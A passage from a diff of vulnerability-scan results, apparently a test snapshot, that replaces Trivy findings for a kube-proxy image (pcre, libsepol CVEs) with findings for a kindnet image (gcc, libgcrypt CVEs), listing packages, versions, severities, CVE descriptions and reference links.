"https://www.cve.org/CVERecord?id=CVE-2018-12886", + "https://www.gnu.org/software/gcc/gcc-8/changes.html", ], }, "category": "Vulnerability", - "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 268) or possibly have unspecified other impact via a crafted file.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", + "name": "gcc: spilling of stack protection address in cfgexpand.c and function.c leads to stack-overflow protection bypass", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-7246", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/97067", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2018:2486", + "value": "https://avd.aquasec.com/nvd/cve-2018-12886", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-7246", + "value": "https://access.redhat.com/security/cve/CVE-2018-12886", }, { "type": "URL", - "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "value": "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/201710-25", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-12886", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-7246", + "value": "https://www.gnu.org/software/gcc/gcc-8/changes.html", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-20838", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-15847", + "installedVersion": "1:8.3.0-6", + "packageName": "libgcc1", "references": [ - "http://seclists.org/fulldisclosure/2020/Dec/32", - "http://seclists.org/fulldisclosure/2021/Feb/14", - "https://access.redhat.com/security/cve/CVE-2019-20838", - "https://bugs.gentoo.org/717920", - "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", - "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", - "https://errata.almalinux.org/8/ALSA-2021-4373.html", - "https://errata.rockylinux.org/RLSA-2021:4373", - "https://linux.oracle.com/cve/CVE-2019-20838.html", - "https://linux.oracle.com/errata/ELSA-2021-4373.html", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", - "https://support.apple.com/kb/HT211931", - "https://support.apple.com/kb/HT212147", - "https://ubuntu.com/security/notices/USN-5425-1", - "https://www.cve.org/CVERecord?id=CVE-2019-20838", - "https://www.pcre.org/original/changelog.txt", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", + "https://access.redhat.com/security/cve/CVE-2019-15847", + "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", + "https://linux.oracle.com/cve/CVE-2019-15847.html", + "https://linux.oracle.com/errata/ELSA-2020-1864.html", + "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + "https://www.cve.org/CVERecord?id=CVE-2019-15847", ], }, "category": "Vulnerability", - "description": "libpcre in PCRE before 8.43 allows a subject buffer over-read in JIT when UTF is disabled, and \\X or \\R has more than one fixed quantifier, a related issue to CVE-2019-20454.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "pcre: Buffer over-read in JIT when UTF is disabled and \\X or \\R has fixed quantifier greater than 1", + "name": "gcc: POWER9 "DARN" RNG intrinsic produces repeated output", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-20838", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2020/Dec/32", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2021/Feb/14", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-20838", - }, - { - "type": "URL", - "value": "https://bugs.gentoo.org/717920", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", - }, - { - "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4373.html", - }, - { - "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4373", + "value": "https://avd.aquasec.com/nvd/cve-2019-15847", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-20838.html", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4373.html", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", + "value": "https://access.redhat.com/security/cve/CVE-2019-15847", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT211931", + "value": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT212147", + "value": "https://linux.oracle.com/cve/CVE-2019-15847.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5425-1", + "value": "https://linux.oracle.com/errata/ELSA-2020-1864.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-20838", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", }, { "type": "URL", - "value": "https://www.pcre.org/original/changelog.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-15847", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36084", - "installedVersion": "3.1-1", - "packageName": "libsepol1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-33560", + "installedVersion": "1.8.4-5", + "packageName": "libgcrypt20", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36084", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", - "https://linux.oracle.com/cve/CVE-2021-36084.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36084", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", + "https://access.redhat.com/security/cve/CVE-2021-33560", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", + "https://dev.gnupg.org/T5305", + "https://dev.gnupg.org/T5328", + "https://dev.gnupg.org/T5466", + "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", + "https://eprint.iacr.org/2021/923", + "https://errata.almalinux.org/8/ALSA-2021-4409.html", + "https://linux.oracle.com/cve/CVE-2021-33560.html", + "https://linux.oracle.com/errata/ELSA-2022-9263.html", + "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", + "https://security.gentoo.org/glsa/202210-13", + "https://ubuntu.com/security/notices/USN-5080-1", + "https://ubuntu.com/security/notices/USN-5080-2", + "https://www.cve.org/CVERecord?id=CVE-2021-33560", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", ], }, "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __cil_verify_classpermission and __cil_pre_verify_helper).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "Libgcrypt before 1.8.8 and 1.9.x before 1.9.3 mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm, and the window size is not chosen appropriately. This, for example, affects use of ElGamal in OpenPGP.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libsepol: use-after-free in __cil_verify_classperms()", + "name": "libgcrypt: mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36084", + "value": "https://avd.aquasec.com/nvd/cve-2021-33560", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36084", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", + "value": "https://access.redhat.com/security/cve/CVE-2021-33560", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://dev.gnupg.org/T5305", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://dev.gnupg.org/T5328", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://dev.gnupg.org/T5466", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://eprint.iacr.org/2021/923", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://errata.almalinux.org/8/ALSA-2021-4409.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://linux.oracle.com/cve/CVE-2021-33560.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-9263.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36084.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://security.gentoo.org/glsa/202210-13", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://ubuntu.com/security/notices/USN-5080-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", + "value": "https://ubuntu.com/security/notices/USN-5080-2", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-33560", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36084", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36085", - "installedVersion": "3.1-1", - "packageName": "libsepol1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-13627", + "installedVersion": "1.8.4-5", + "packageName": "libgcrypt20", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36085", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", - "https://linux.oracle.com/cve/CVE-2021-36085.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36085", + "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00060.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00018.html", + "http://www.openwall.com/lists/oss-security/2019/10/02/2", + "https://access.redhat.com/security/cve/CVE-2019-13627", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13627", + "https://dev.gnupg.org/T4683", + "https://github.com/gpg/libgcrypt/releases/tag/libgcrypt-1.8.5", + "https://linux.oracle.com/cve/CVE-2019-13627.html", + "https://linux.oracle.com/errata/ELSA-2020-4482.html", + "https://lists.debian.org/debian-lts-announce/2019/09/msg00024.html", + "https://lists.debian.org/debian-lts-announce/2020/01/msg00001.html", + "https://minerva.crocs.fi.muni.cz/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-13627", + "https://security-tracker.debian.org/tracker/CVE-2019-13627", + "https://security.gentoo.org/glsa/202003-32", + "https://ubuntu.com/security/notices/USN-4236-1", + "https://ubuntu.com/security/notices/USN-4236-2", + "https://ubuntu.com/security/notices/USN-4236-3", + "https://usn.ubuntu.com/4236-1/", + "https://usn.ubuntu.com/4236-2/", + "https://usn.ubuntu.com/4236-3/", + "https://www.cve.org/CVERecord?id=CVE-2019-13627", ], }, "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __verify_map_perm_classperms and hashtab_map).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "It was discovered that there was a ECDSA timing attack in the libgcrypt20 cryptographic library. Version affected: 1.8.4-5, 1.7.6-2+deb9u3, and 1.6.3-2+deb8u4. Versions fixed: 1.8.5-2 and 1.6.3-2+deb8u7.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libsepol: use-after-free in __cil_verify_classperms()", + "name": "libgcrypt: ECDSA timing attack allowing private key leak", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36085", + "value": "https://avd.aquasec.com/nvd/cve-2019-13627", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36085", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00060.html", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00018.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "http://www.openwall.com/lists/oss-security/2019/10/02/2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://access.redhat.com/security/cve/CVE-2019-13627", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13627", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://dev.gnupg.org/T4683", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://github.com/gpg/libgcrypt/releases/tag/libgcrypt-1.8.5", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://linux.oracle.com/cve/CVE-2019-13627.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://linux.oracle.com/errata/ELSA-2020-4482.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://lists.debian.org/debian-lts-announce/2019/09/msg00024.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://lists.debian.org/debian-lts-announce/2020/01/msg00001.html", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://minerva.crocs.fi.muni.cz/", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-13627", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-13627", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36085.html", + "value": "https://security.gentoo.org/glsa/202003-32", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://ubuntu.com/security/notices/USN-4236-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://ubuntu.com/security/notices/USN-4236-2", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", + "value": "https://ubuntu.com/security/notices/USN-4236-3", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://usn.ubuntu.com/4236-1/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36085", + "value": "https://usn.ubuntu.com/4236-2/", + }, + { + "type": "URL", + "value": "https://usn.ubuntu.com/4236-3/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-13627", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-36086", - "installedVersion": "3.1-1", - "packageName": "libsepol1", + "fixedVersion": "1.8.4-5+deb10u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-40528", + "installedVersion": "1.8.4-5", + "packageName": "libgcrypt20", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-36086", - "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", - "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", - "https://errata.almalinux.org/8/ALSA-2021-4513.html", - "https://errata.rockylinux.org/RLSA-2021:4513", - "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", - "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", - "https://linux.oracle.com/cve/CVE-2021-36086.html", - "https://linux.oracle.com/errata/ELSA-2021-4513.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", - "https://ubuntu.com/security/notices/USN-5391-1", - "https://www.cve.org/CVERecord?id=CVE-2021-36086", + "https://access.redhat.com/errata/RHSA-2022:5311", + "https://access.redhat.com/security/cve/CVE-2021-40528", + "https://bugzilla.redhat.com/2002816", + "https://bugzilla.redhat.com/show_bug.cgi?id=2002816", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40528", + "https://dev.gnupg.org/rCb118681ebc4c9ea4b9da79b0f9541405a64f4c13", + "https://eprint.iacr.org/2021/923", + "https://errata.almalinux.org/8/ALSA-2022-5311.html", + "https://errata.rockylinux.org/RLSA-2022:5311", + "https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libgcrypt.git;a=commit;h=3462280f2e23e16adf3ed5176e0f2413d8861320", + "https://ibm.github.io/system-security-research-updates/2021/07/20/insecurity-elgamal-pt1", + "https://ibm.github.io/system-security-research-updates/2021/09/06/insecurity-elgamal-pt2", + "https://linux.oracle.com/cve/CVE-2021-40528.html", + "https://linux.oracle.com/errata/ELSA-2022-9564.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-40528", + "https://security.gentoo.org/glsa/202210-13", + "https://ubuntu.com/security/notices/USN-5080-1", + "https://ubuntu.com/security/notices/USN-5080-2", + "https://www.cve.org/CVERecord?id=CVE-2021-40528", ], }, "category": "Vulnerability", - "description": "The CIL compiler in SELinux 3.2 has a use-after-free in cil_reset_classpermission (called from cil_reset_classperms_set and cil_reset_classperms_list).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The ElGamal implementation in Libgcrypt before 1.9.4 allows plaintext recovery because, during interaction between two cryptographic libraries, a certain dangerous combination of the prime defined by the receiver's public key, the generator defined by the receiver's public key, and the sender's ephemeral exponents can lead to a cross-configuration attack against OpenPGP.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "use-after-free in cil_reset_classpermission()", + "name": "ElGamal implementation allows plaintext recovery", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-36086", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-36086", + "value": "https://avd.aquasec.com/nvd/cve-2021-40528", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", + "value": "https://access.redhat.com/errata/RHSA-2022:5311", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "https://access.redhat.com/security/cve/CVE-2021-40528", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://bugzilla.redhat.com/2002816", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2002816", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40528", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://dev.gnupg.org/rCb118681ebc4c9ea4b9da79b0f9541405a64f4c13", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://eprint.iacr.org/2021/923", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://errata.almalinux.org/8/ALSA-2022-5311.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://errata.rockylinux.org/RLSA-2022:5311", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libgcrypt.git;a=commit;h=3462280f2e23e16adf3ed5176e0f2413d8861320", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://ibm.github.io/system-security-research-updates/2021/07/20/insecurity-elgamal-pt1", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", + "value": "https://ibm.github.io/system-security-research-updates/2021/09/06/insecurity-elgamal-pt2", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", + "value": "https://linux.oracle.com/cve/CVE-2021-40528.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36086.html", + "value": "https://linux.oracle.com/errata/ELSA-2022-9564.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-40528", }, { "type": 